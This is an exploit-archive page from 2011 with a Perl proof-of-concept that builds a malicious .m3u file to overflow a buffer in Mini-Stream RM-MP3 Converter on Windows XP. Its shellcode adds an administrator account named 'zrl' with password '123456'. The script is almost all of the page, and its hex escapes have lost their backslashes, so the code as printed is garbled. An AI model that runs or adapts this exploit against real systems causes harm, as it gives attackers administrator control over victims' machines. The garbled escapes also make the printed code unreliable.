Home / os / win7

Mini-Stream RM-MP3 Converter Buffer Overflow

Posted on 18 January 2011

# Title        : Mini-stream RM-MP3 Converter Buffer Overflow Exploit
# Author       : ZoRLu
# Proof        : http://img843.imageshack.us/img843/3144/buffer.jpg
# Desc.        : usr: zrl , pass: 123456 , localgroup: Administrator
#Tested        : xp/sp3
# mail-msn     : admin@yildirimordulari.com
# Home         : http://z0rlu.blogspot.com
# Date         : 04/01/2011
# Teþekkür     : Dr.Ly0n LifeSteaLeR

my $dosya= "zrl.m3u";
my $zart= "x41" x 26059;
my $zurt= "x90" x 24;
my $eip = pack('V',0x7E3EA32F);  # 0x7E3EA32F  user32.dll jmp esp

# windows/exec - 127 bytes
# Thanks to http://www.exploit-db.com/exploits/15063/
# Encoder: win32/ZoRLu
# Desc.: usr: zrl , pass: 123456
# CMD=Add Admin
my $shell = "xebx1bx5bx31xc0x50x31xc0x88x43x5dx53xbbxadx23x86x7c".
"xffxd3x31xc0x50xbbxfaxcax81x7cxffxd3xe8xe0xffxffxff".
"x63x6dx64x2ex65x78x65x20x2fx63x20x6ex65x74x20x75x73".
"x65x72x20x7ax72x6cx20x31x32x33x34x35x36x20x2fx61x64".
"x64x20x26x26x20x6ex65x74x20x6cx6fx63x61x6cx67x72x6f".
"x75x70x20x41x64x6dx69x6ex69x73x74x72x61x74x6fx72x73".
"x20x2fx61x64x64x20x7ax72x6cx20x26x26x20x6ex65x74x20".
"x75x73x65x72x20x7ax72x6c";

open($FILE,">$dosya");
print $FILE $zart.$eip.$zurt.$shell;
close($FILE);
print "
$dosya Dosyasi Hazir
";

 

TOP

Malware :

Exploits :